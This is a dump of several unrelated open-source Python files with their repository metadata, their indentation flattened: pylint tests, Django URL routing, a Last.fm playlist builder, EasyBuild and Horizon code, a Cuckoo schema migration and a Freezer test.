if self.module.startswith('func_noerror_'):
expected = ''
else:
output = open(self.output)
expected = output.read().strip()
output.close()
got = self.linter.reporter.finalize().strip()
try:
self.assertLinesEquals(got, expected)
except Exception, ex:
# doesn't work with py 2.5
#ex.file = tocheck
#ex.__str__ = new.instancemethod(exception_str, ex, None)
raise AssertionError('%s: %s' % (self.module, ex)), None, sys.exc_info()[-1]
class LintTestUsingFile(LintTestUsingModule):
_TEST_TYPE = 'file'
def test_functionality(self):
tocheck = [self.package+'/' + self.module + '.py']
if self.depends:
tocheck += [self.package+'/%s' % name for name, file in self.depends]
self._test(tocheck)
class TestTests(testlib.TestCase):
"""check that all testable messages have been checked"""
@testlib.tag('coverage')
def test_exhaustivity(self):
# skip fatal messages
todo = [msgid for msgid in linter._messages.keys() if msgid[0] != 'F']
for msgid in test_reporter.message_ids.keys():
try:
todo.remove(msgid)
except ValueError:
continue
todo.sort()
if PY25:
self.assertEqual(todo, ['E0503', 'I0001'])
elif PY23:
self.assertEqual(todo, ['E0503', 'I0001'])
else: # python < 2.3
self.assertEqual(todo, ['I0001'])
#bycat = {}
#for msgid in linter._messages.keys():
# bycat[msgid[0]] = bycat.setdefault(msgid[0], 0) + 1
#for cat, val in bycat.items():
# print '%s: %s' % (cat, val)
#print 'total', sum(bycat.values())
#
# on 2007/02/17:
#
# W: 48
# E: 42
# R: 15
# C: 13
# F: 7
# I: 5
# total 130
def make_tests(filter_rgx):
"""generate tests classes from test info
return the list of generated test classes
"""
if filter_rgx:
is_to_run = re.compile(filter_rgx).search
else:
is_to_run = lambda x: 1
tests = []
for module_file, messages_file in get_tests_info('func_', '.py') + [('nonexistant', 'messages/nonexistant.txt')]:
# skip those tests with python >= 2.3 since py2.3 detects them by itself
if PY23 and module_file == "func_unknown_encoding.py": #"func_nonascii_noencoding.py"):
continue
pyrestr = module_file.rsplit('_py', 1)[-1][:-3]
if pyrestr.isdigit(): # '24', '25'...
if sys.version_info < tuple([int(i) for i in pyrestr]):
continue
if not is_to_run(module_file):
continue
base = module_file.replace('func_', '').replace('.py', '')
dependencies = get_tests_info(base, '.py')
class LintTestUsingModuleTC(LintTestUsingModule):
module = module_file.replace('.py', '')
output = messages_file
depends = dependencies or None
tags = testlib.Tags(('generated','pylint_input_%s' % module))
tests.append(LintTestUsingModuleTC)
if MODULES_ONLY:
continue
class LintTestUsingFileTC(LintTestUsingFile):
module = module_file.replace('.py', '')
output = exists(messages_file + '2') and (messages_file + '2') or messages_file
depends = dependencies or None
tags = testlib.Tags(('generated', 'pylint_input_%s' % module))
tests.append(LintTestUsingFileTC)
## # special test for f0003
## module_file, messages_file in get_tests_info('func_f0003', '.pyc')
## class LintTestSubclass(LintTest):
## module = module_file.replace('.pyc', '')
## output = messages_file
## depends = dependencies or None
## tests.append(LintTestSubclass)
class LintBuiltinModuleTest(LintTestUsingModule):
output = 'messages/builtin_module.txt'
module = 'sys'
def test_functionality(self):
self._test(['sys'])
tests.append(LintBuiltinModuleTest)
if not filter_rgx:
# test all features are tested :)
tests.append(TestTests)
return tests
FILTER_RGX = None
MODULES_ONLY = False
def suite():
return unittest.TestSuite([unittest.makeSuite(test)
for test in make_tests(FILTER_RGX)])
if __name__=='__main__':
if '-m' in sys.argv:
MODULES_ONLY = True
sys.argv.remove('-m')
if len(sys.argv) > 1:
FILTER_RGX = sys.argv[1]
del sys.argv[1]
testlib.unittest_main(defaultTest='suite')
| dbbhattacharya/kitsune | vendor/packages/pylint/test/test_func.py | Python | bsd-3-clause | 7,955 | 0.007291 |
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.urls import path
from confla import views
app_name = "confla"
urlpatterns = [
path('admin/', admin.site.urls),
url(r'^$', views.IndexView.my_view, name='index'),
url(r'add_rooms/$', views.AddRoomsView.view_form, name='add_rooms'),
url(r'^events/popover/$', views.EventView.get_popover, name='eventPop'),
url(r'^events/modal/$', views.EventEditView.event_modal, name='eventMod'),
url(r'^login/$', views.LoginView.my_view, name='login'),
url(r'^logout/$', views.LoginView.logout, name='logout'),
url(r'^process/$', views.LoginView.auth_and_login, name='process_login'),
url(r'^users/$', views.UserView.my_view, name='users'),
url(r'^user/(?P<url_username>\w+)/profile/$', views.UserView.view_profile, name='profile'),
url(r'^user/(?P<url_username>\w+)/delete_mail/(?P<id>\d+)/', views.UserView.delete_email, name='delete_email'),
url(r'^user/(?P<url_username>\w+)/set_primary_mail/(?P<id>\d+)/', views.UserView.set_email_primary, name='set_primary_email'),
url(r'^user/volunteer/$', views.VolunteerView.my_view, name='volunteer'),
url(r'^register/$', views.RegisterView.user_register, name='register'),
url(r'^reset_password/$', views.RegisterView.reset_password, name='reset_password'),
url(r'^reset_password2/(?P<email_address>[^/]+)/(?P<token>[^/]+)$', views.RegisterView.reset_password2, name='reset_password2'),
#url(r'^reg_talk/$', views.RegisterView.save_form_and_register, name='reg_talk'),
#url(r'^notlogged/$', views.UserView.not_logged, name='notlogged'),
url(r'^i18n/', include('django.conf.urls.i18n'), name='set_language'),
url(r'^(?P<url_id>\w+)/$', views.AboutView.splash_view, name='splash'),
url(r'^(?P<url_id>\w+)/cfp/$', views.CfpView.save_form_and_register, name='cfp'),
url(r'^(?P<url_id>\w+)/about/$', views.AboutView.splash_view, name='about'),
url(r'^(?P<url_id>\w+)/events/$', views.EventView.event_list, name='event_list'),
url(r'^(?P<url_id>\w+)/places/$', views.PlacesView.osm, name='places'),
url(r'^(?P<url_id>\w+)/about/(?P<page>\w+)$', views.PagesView.content, name='pages'),
url(r'^(?P<url_id>\w+)/speakers/grid/$', views.UserView.speaker_grid, name='speaker_grid'),
url(r'^(?P<url_id>\w+)/speakers/list/$', views.UserView.speaker_list, name='speaker_list'),
url(r'^(?P<url_id>\w+)/sched/$', views.ScheduleView.my_view, name='schedule'),
url(r'^(?P<url_id>\w+)/sched/list/$', views.ScheduleView.list_view, name='listsched'),
url(r'^(?P<url_id>\w+)/sched/list/(?P<id>\d+)/$', views.ScheduleView.list_view, name='listschedTag'),
url(r'^(?P<url_id>\w+)/config/$', views.RoomConfView.slot_view, name='conf_rooms'),
url(r'^(?P<url_id>\w+)/config/save/$', views.RoomConfView.save_config, name='rooms_conf_save'),
url(r'^(?P<url_id>\w+)/export/m_app/$', views.ExportView.m_app, name='export_mapp'),
url(r'^(?P<url_id>\w+)/export/csv/$', views.ExportView.csv, name='export_csv'),
url(r'^org/admin/geo_icons/$', views.IconsView.table, name='geo_icons'),
url(r'^org/admin/geo_points/$', views.PlacesView.table, name='geo_points'),
url(r'^org/admin/stats/$', views.AdminView.dashboard, name='org_dashboard'),
url(r'^org/admin/newconf/$', views.ConferenceView.create_conf, name='create_conf'),
url(r'^org/admin/createroom/$', views.ConferenceView.create_room, name='create_room'),
url(r'^org/admin/createtag/$', views.EventEditView.create_event_tag, name='create_event_tag'),
url(r'^org/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf'),
url(r'^org/admin/users/$', views.AdminView.users, name='org_users'),
url(r'^org/admin/$', views.AdminView.conf_list, name='org_conf_list'),
url(r'^export/conference_list/$', views.ExportView.conf_list, name='conf_list_export'),
url(r'^(?P<url_id>\w+)/admin/$', views.AdminView.dashboard, name='dashboard'),
url(r'^(?P<url_id>\w+)/admin/conf/edit/$', views.ConferenceView.edit_conf, name='edit_conf'),
url(r'^(?P<url_id>\w+)/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf_urlid'),
url(r'^(?P<url_id>\w+)/admin/pages/$', views.PagesView.pages_list, name='admin_pages'),
url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/edit/$', views.PagesView.edit_page, name='edit_page'),
url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/save/$', views.PagesView.save_page, name='save_page'),
url(r'^(?P<url_id>\w+)/admin/users/$', views.AdminView.users, name='speakers'),
url(r'^(?P<url_id>\w+)/admin/sched/edit/$', views.TimetableView.view_timetable, name='adminsched'),
url(r'^(?P<url_id>\w+)/admin/sched/edit/saveTable/$', views.TimetableView.save_timetable, name='saveTable'),
url(r'^(?P<url_id>\w+)/admin/sched/edit/saveEvent/$', views.TimetableView.save_event, name='saveEvent'),
url(r'^(?P<url_id>\w+)/admin/sched/edit/popover/$', views.EventView.get_admin_popover, name='eventPop_admin'),
url(r'^(?P<url_id>\w+)/admin/eventlist/$', views.EventEditView.event_view, name='editEvent'),
url(r'^(?P<url_id>\w+)/admin/eventlist/(?P<id>\d+)/$', views.EventEditView.event_view, name='editEvent'),
url(r'^(?P<url_id>\w+)/admin/eventlist/editEvent/(?P<id>\d+)/$', views.EventEditView.event_save, name='editEvent2'),
url(r'^(?P<url_id>\w+)/admin/import/$', views.ImportView.import_view, name='import'),
url(r'^(?P<url_id>\w+)/admin/import/json/$', views.ImportView.json_upload, name='json_import'),
url(r'^(?P<url_id>\w+)/admin/export/$', views.ExportView.export_view, name='export'),
url(r'^activate/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',views.RegisterView.activate_email , name='activate_email'),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| rh-lab-q/conflab | wsgi/openshift/confla/urls.py | Python | gpl-3.0 | 6,136 | 0.008638 |
from pprint import pprint
from django.shortcuts import render
def index(request):
return render(request, 'itat/index.html')
| anselmobd/fo2 | src/itat/views/views.py | Python | mit | 131 | 0 |
# -*- coding: utf-8 -*-
import ConfigParser, sys, os, urllib2, json, time, shutil, filecmp
import Levenshtein
config = ConfigParser.ConfigParser()
config.read("config.ini")
def clean(chaine):
#print chaine
return chaine.lower().strip()
def decode(chaine):
chaine = chaine.replace(u"\u2018", "'").replace(u"\u2019", "'")
try:
chaine = unicodedata.normalize('NFKD', chaine).encode('ascii','ignore')
return chaine
except:
return chaine
def remove_accents(input_str):
try:
nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))
return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
except:
return input_str
def cc(i):
return decode(clean(remove_accents(i)))
def getKey(item):
return item[0]
class playlist:
def __init__(self, limit, page=1, period="overall"):
self.api_key = config.get("lastfm",'key')
self.music_dir = config.get("lastfm",'directory')
self.page = page
self.mp_dir = config.get("lastfm",'mudir')
self.user = config.get("lastfm",'user')
self.dossier = os.listdir(self.music_dir)
self.period = period
self.limit = limit
self.notfound = []
#for i in req!
def lastfm(self, meth):
try:
url = 'http://ws.audioscrobbler.com/2.0/?api_key='+self.api_key+'&autocorrect=1'+meth+'&format=json&page='+str(self.page)
txt = urllib2.urlopen(url).read()
return json.loads(txt)
except urllib2.HTTPError:
#print '\n Error : '+art
return None
def toptracks(self):
url = '&method=user.gettoptracks&user='+self.user+'&limit='+self.limit+'&period='+self.period;
req = self.lastfm(url)
for i in req["toptracks"]["track"]:
#if cc(i['artist']['name']) == "high tone":
yield {'name':i['name'],'artist':cc(i['artist']['name'])}
"""Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2"""
def findartist(self, artist):
textlog = " find (" + artist + "):\n"
lev = {}
# Chaque artiste dans le dossier
for art in self.dossier:
ar = cc(art)
# Correspondance exacte (pas de majuscule, pas d'accents, pas d'expace)
if ar == artist:
##print "YES BITCH"
return art
# Distance de levenshtein: on stocke si pas trop de difference
elif abs(len(ar) - len(artist)) < 5:
l = Levenshtein.distance(ar, artist)
if l < (len(art)/2):
if not l in lev.keys():
lev[l] = []
lev[l].append(art)
# On process
textlog += str(lev) + "\n"
if lev != {} and len( lev[min(lev.keys())] ) == 1:
##print lev[min(lev.keys())][0]
##print "YES BIS BITCHY BITCH"
return lev[min(lev.keys())][0]
else:
pass ##print textlog
"""Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2"""
def findtrack(self, artist, track, i=0, lev=False):
# Chaque truc dans le dossier
base = self.music_dir + "/" + artist
for fil in os.listdir(base):
if os.path.isdir(base +"/"+ fil):
##print ("findtrack " + artist + " / " + fil + " - " + track)
try:
for result in self.findtrack(artist + "/" + fil, track, i=i+1, lev=lev):
yield result
except UnicodeDecodeError:
pass
if os.path.isfile(base +"/"+ fil):
if lev:
nfil = cc(clean(unicode(fil[:-4],'utf-8')))
ntr = cc(clean(track))
l = Levenshtein.distance(ntr, nfil)
if l < len(ntr):
##print "lev |" + ntr + "|" + nfil + "|"
##print str(l) + " - " + str(len(cc(track)))
yield [l, base+"/"+fil]
else:
if clean(track) in clean(unicode(fil,'utf-8')):
##print base+"/"+fil
yield base+"/"+fil
def mkdirs(self, li, pat):
if li != []:
dd = os.path.join(pat, li[0])
if not os.path.isdir( dd ):
##print "mkdir(" + dd+")"
os.mkdir(dd)
return self.mkdirs(li[1:], dd)
else:
return pat
def move(self, t):
dirs = t[len(self.music_dir)+1:].split("/")
new = self.mkdirs(dirs[:-1], self.mp_dir)
dst = os.path.join(new, dirs[-1])
if os.path.isfile( dst ):
if os.path.getsize(t) != os.path.getsize(dst):
os.remove(dst)
else:
return 1
shutil.copyfile(t, dst)
##print "exist"
#shutil.copyfile(t, dst)
def findtrackall(self, a, i):
for t in self.findtrack(a, i['name']):
return t
##print "### :: " + i['artist'] + '-' + i['name'] + ""
ties = []
for t in self.findtrack(a, i['name'], lev=True):
ties.append(t)
if len(ties) == 0:
return 0
if len(ties) == 1:
##print ties[0][1]
return ties[0][1]
else:
ties = sorted(ties, key=getKey)
##print ties[0][1]
return ties[0][1]
def run(self):
file = time.strftime("TOP"+self.limit+"_%m%d%H%M.m3u")
fo = open(file, 'w+')
number = 0
for i in self.toptracks():
number += 1
print number
#for i in [{'name':u"The sound of silence",'artist':u"Simon and Garfunkel"}]:
a = self.findartist(i['artist'])
t = 0
if a:
t = self.findtrackall(a, i)
if t == 0:
t = self.findtrackall("Various Artists", i)
##print t
if t != 0:
fo.write(t+"\n")
if os.path.isdir( self.mp_dir ):
self.move(t)
else:
#print "###########"
#print i['artist'] + '-' + i['name']
pass
#print self.notfound
#print '--finished--'
fo.close()
# <?xml version="1.0" encoding="UTF-8"?>
# <playlist version="1" xmlns="http://xspf.org/ns/0/">
# <trackList>
# <track><location>file:///media/data/Musique/Cypress Hill/2010 - Rise Up/Cypress Hill - Rise Up - 13 - Armed and Dangerous.mp3</location></track>
# <track><location>file:///media/data/Musique/The Black Keys/Attack & Release/The Black Keys - Psychotic Girl.mp3</location></track>
# <track><location>file:///media/data/Musique/Odezenne/2012 - OVNI edition Louis XIV/13 - Hirondelles.mp3</location></track>
# </trackList>
# </playlist>
pass
if len(sys.argv) == 0 :
print "usage : python playlist.py length page"
else:
if len(sys.argv) <= 1 :
p = playlist(100)
elif len(sys.argv) <= 2 :
p = playlist(sys.argv[1])
elif len(sys.argv) <= 3 :
p = playlist(sys.argv[1], sys.argv[2])
else: p = playlist(sys.argv[1], sys.argv[2], sys.argv[3])
p.run()
| pdevetto/misc | lastfm/playlist.py | Python | gpl-3.0 | 7,352 | 0.010473 |
##
# Copyright 2012-2021 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for gomkl compiler toolchain (includes GCC, OpenMPI,
Intel Math Kernel Library (MKL) and Intel FFTW wrappers).
:author: Stijn De Weirdt (Ghent University)
:author: Kenneth Hoste (Ghent University)
:author: Ake Sandgren (Umea University)
"""
from easybuild.toolchains.gompi import Gompi
from easybuild.toolchains.gmkl import Gmkl
from easybuild.toolchains.fft.intelfftw import IntelFFTW
from easybuild.toolchains.linalg.intelmkl import IntelMKL
class Gomkl(Gompi, IntelMKL, IntelFFTW):
"""Compiler toolchain with GCC, OpenMPI, Intel Math Kernel Library (MKL) and Intel FFTW wrappers."""
NAME = 'gomkl'
SUBTOOLCHAIN = [Gompi.NAME, Gmkl.NAME]
| hpcugent/easybuild-framework | easybuild/toolchains/gomkl.py | Python | gpl-2.0 | 1,727 | 0.001737 |
import json
from rhino import Mapper, get
# Our internal representation
report = {
'title': 'foo',
'author': 'Fred',
'date': '2015-01-09',
'tags': ['a', 'b', 'c'],
}
# Base class for our representations
class report_repr(object):
@classmethod
def serialize(cls, report):
obj = dict([(k, report[k]) for k in cls.fields])
return json.dumps(obj, sort_keys=True)
# Different versions of the representation
class report_v1(report_repr):
provides = 'application/vnd.acme.report+json;v=1'
fields = ['title', 'author']
class report_v2(report_repr):
provides = 'application/vnd.acme.report+json;v=2'
fields = ['title', 'author', 'date']
class report_v3(report_repr):
provides = 'application/vnd.acme.report+json;v=3'
fields = ['title', 'author', 'date', 'tags']
# One handler can handle multiple representations.
# Here, report_v3 is the default when the client doesn't specify a preference.
@get(produces=report_v1)
@get(produces=report_v2)
@get(produces=report_v3)
def get_report(request):
return report
app = Mapper()
app.add('/', get_report)
if __name__ == '__main__':
app.start_server()
| trendels/rhino | examples/content_type_versioning.py | Python | mit | 1,165 | 0.004292 |
# Copyright 2013 Kylin, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.urls import reverse
import mock
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
INDEX_URL = reverse('horizon:admin:defaults:index')
class ServicesViewTests(test.BaseAdminViewTests):
@test.create_mocks({
api.nova: [('default_quota_get', 'nova_default_quota_get')],
api.cinder: [('default_quota_get', 'cinder_default_quota_get'),
'is_volume_service_enabled'],
api.base: ['is_service_enabled'],
api.neutron: [('default_quota_get', 'neutron_default_quota_get')],
quotas: ['enabled_quotas']})
def test_index(self):
# Neutron does not have an API for getting default system
# quotas. When not using Neutron, the floating ips quotas
# should be in the list.
self.mock_is_volume_service_enabled.return_value = True
self.mock_is_service_enabled.return_value = True
compute_quotas = [q.name for q in self.quotas.nova]
self.mock_enabled_quotas.return_value = compute_quotas
self.mock_nova_default_quota_get.return_value = self.quotas.nova
self.mock_cinder_default_quota_get.return_value = \
self.cinder_quotas.first()
self.mock_neutron_default_quota_get.return_value = \
self.neutron_quotas.first()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'admin/defaults/index.html')
expected_data = [
'<Quota: (injected_file_content_bytes, 1)>',
'<Quota: (metadata_items, 1)>',
'<Quota: (injected_files, 1)>',
'<Quota: (ram, 10000)>',
'<Quota: (instances, 10)>',
'<Quota: (cores, 10)>',
'<Quota: (key_pairs, 100)>',
'<Quota: (server_groups, 10)>',
'<Quota: (server_group_members, 10)>',
'<Quota: (injected_file_path_bytes, 255)>',
]
self._check_quotas_data(res, 'compute_quotas', expected_data)
expected_data = [
'<Quota: (gigabytes, 1000)>',
'<Quota: (snapshots, 1)>',
'<Quota: (volumes, 1)>',
]
self._check_quotas_data(res, 'volume_quotas', expected_data)
expected_data = [
'<Quota: (network, 10)>',
'<Quota: (subnet, 10)>',
'<Quota: (port, 50)>',
'<Quota: (router, 10)>',
'<Quota: (floatingip, 50)>',
'<Quota: (security_group, 20)>',
'<Quota: (security_group_rule, 100)>',
]
self._check_quotas_data(res, 'network_quotas', expected_data)
self.mock_is_volume_service_enabled.assert_called_once_with(
test.IsHttpRequest())
self.assertEqual(2, self.mock_is_service_enabled.call_count)
self.mock_is_service_enabled.assert_has_calls([
mock.call(test.IsHttpRequest(), 'compute'),
mock.call(test.IsHttpRequest(), 'network')])
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_enabled_quotas, 4,
mock.call(test.IsHttpRequest()))
self.mock_nova_default_quota_get.assert_called_once_with(
test.IsHttpRequest(), self.tenant.id)
self.mock_cinder_default_quota_get.assert_called_once_with(
test.IsHttpRequest(), self.tenant.id)
self.mock_neutron_default_quota_get.assert_called_once_with(
test.IsHttpRequest())
def _check_quotas_data(self, res, slug, expected_data):
quotas_tab = res.context['tab_group'].get_tab(slug)
self.assertQuerysetEqual(quotas_tab._tables[slug].data,
expected_data,
ordered=False)
class UpdateDefaultQuotasTests(test.BaseAdminViewTests):
def _get_quota_info(self, quota):
quota_data = {}
updatable_quota_fields = (quotas.NOVA_QUOTA_FIELDS |
quotas.CINDER_QUOTA_FIELDS)
for field in updatable_quota_fields:
if field != 'fixed_ips':
limit = quota.get(field).limit or 10
quota_data[field] = int(limit)
return quota_data
@test.create_mocks({
api.nova: [('default_quota_update', 'nova_default_quota_update'),
('default_quota_get', 'nova_default_quota_get')],
api.cinder: [('default_quota_update', 'cinder_default_quota_update'),
('default_quota_get', 'cinder_default_quota_get')],
quotas: ['get_disabled_quotas']})
def test_update_default_quotas(self):
quota = self.quotas.first() + self.cinder_quotas.first()
self.mock_get_disabled_quotas.return_value = set()
self.mock_nova_default_quota_get.return_value = self.quotas.first()
self.mock_nova_default_quota_update.return_value = None
self.mock_cinder_default_quota_get.return_value = \
self.cinder_quotas.first()
self.mock_cinder_default_quota_update.return_value = None
# update some fields
quota[0].limit = 123
quota[1].limit = -1
updated_quota = self._get_quota_info(quota)
url = reverse('horizon:admin:defaults:update_defaults')
res = self.client.post(url, updated_quota)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_get_disabled_quotas.assert_called_once_with(
test.IsHttpRequest())
nova_fields = quotas.NOVA_QUOTA_FIELDS
nova_updated_quota = dict((key, updated_quota[key]) for key in
nova_fields if key != 'fixed_ips')
self.mock_nova_default_quota_get.assert_called_once_with(
test.IsHttpRequest(), self.request.user.tenant_id)
self.mock_nova_default_quota_update.assert_called_once_with(
test.IsHttpRequest(), **nova_updated_quota)
cinder_updated_quota = dict((key, updated_quota[key]) for key in
quotas.CINDER_QUOTA_FIELDS)
self.mock_cinder_default_quota_get.assert_called_once_with(
test.IsHttpRequest(), self.request.user.tenant_id)
self.mock_cinder_default_quota_update.assert_called_once_with(
test.IsHttpRequest(), **cinder_updated_quota)
| NeCTAR-RC/horizon | openstack_dashboard/dashboards/admin/defaults/tests.py | Python | apache-2.0 | 6,926 | 0 |
# Copyright (C) 2010-2013 Claudio Guarnieri.
# Copyright (C) 2014-2016 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
"""Added failed statuses to tasks (from Cuckoo 1.1 to 1.2)
Revision ID: 495d5a6edef3
Revises: 18eee46c6f81
Create Date: 2015-02-28 19:08:29.284111
"""
# Spaghetti as a way of life.
# Revision identifiers, used by Alembic.
revision = "495d5a6edef3"
down_revision = "18eee46c6f81"
import sqlalchemy as sa
from datetime import datetime
from alembic import op
from dateutil.parser import parse
import cuckoo.core.database as db
def upgrade():
conn = op.get_bind()
# Deal with Alembic shit.
# Alembic is so ORMish that it was impossible to write code which works on different DBMS.
if conn.engine.driver == "psycopg2":
# Altering status ENUM.
# This shit of raw SQL is here because alembic doesn't deal well with alter_colum of ENUM type.
# Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction.
op.execute('COMMIT')
conn.execute("ALTER TYPE status_type ADD VALUE 'failed_reporting'")
else:
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, clock, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["clock"] = item[12]
elif item[12]:
d["clock"] = parse(item[12])
else:
d["clock"] = None
if isinstance(item[13], datetime):
d["added_on"] = item[13]
elif item[13]:
d["added_on"] = parse(item[13])
else:
d["added_on"] = None
if isinstance(item[14], datetime):
d["started_on"] = item[14]
elif item[14]:
d["started_on"] = parse(item[14])
else:
d["started_on"] = None
if isinstance(item[15], datetime):
d["completed_on"] = item[15]
elif item[15]:
d["completed_on"] = parse(item[15])
else:
d["completed_on"] = None
d["status"] = item[16]
d["sample_id"] = item[17]
tasks_data.append(d)
if conn.engine.driver == "mysqldb":
# Disable foreign key checking to migrate table avoiding checks.
op.execute('SET foreign_key_checks = 0')
# Drop old table.
op.drop_table("tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create table with 1.2 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
op.execute('COMMIT')
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
# Enable foreign key.
op.execute('SET foreign_key_checks = 1')
else:
op.drop_table("tasks")
# Create table with 1.2 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
def downgrade():
pass
| cuckoobox/cuckoo | cuckoo/private/db_migration/versions/from_1_1_to_1_2-added_states.py | Python | mit | 7,228 | 0.004289 |
# (c) Copyright 2018 ZTE Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for manipulating Action via the DB API"""
import copy
from unittest import mock
from unittest.mock import patch
from freezer_api.common import exceptions as freezer_api_exc
from freezer_api.tests.unit import common
from freezer_api.tests.unit.sqlalchemy import base
class DbActionTestCase(base.DbTestCase):
def setUp(self):
super(DbActionTestCase, self).setUp()
self.fake_action_0 = common.get_fake_action_0()
self.fake_action_2 = common.get_fake_action_2()
self.fake_action_3 = common.get_fake_action_3()
self.freezer_action_0 = self.fake_action_0.get('freezer_action')
self.freezer_action_2 = self.fake_action_2.get('freezer_action')
self.fake_project_id = self.fake_action_0.get('project_id')
self.fake_user_id = self.fake_action_0.get('user_id')
self.fake_action_id = common.get_fake_action_id()
def test_add_and_get_action(self):
action_doc = copy.deepcopy(self.fake_action_0)
action_id = self.dbapi.add_action(user_id=self.fake_action_0.
get('user_id'),
doc=action_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(action_id)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_0.
get('user_id'),
action_id=action_id)
self.assertIsNotNone(result)
self.assertEqual(result.get('max_retries'),
self.fake_action_0.get('max_retries'))
self.assertEqual(result.get('max_retries_interval'),
self.fake_action_0.get('max_retries_interval'))
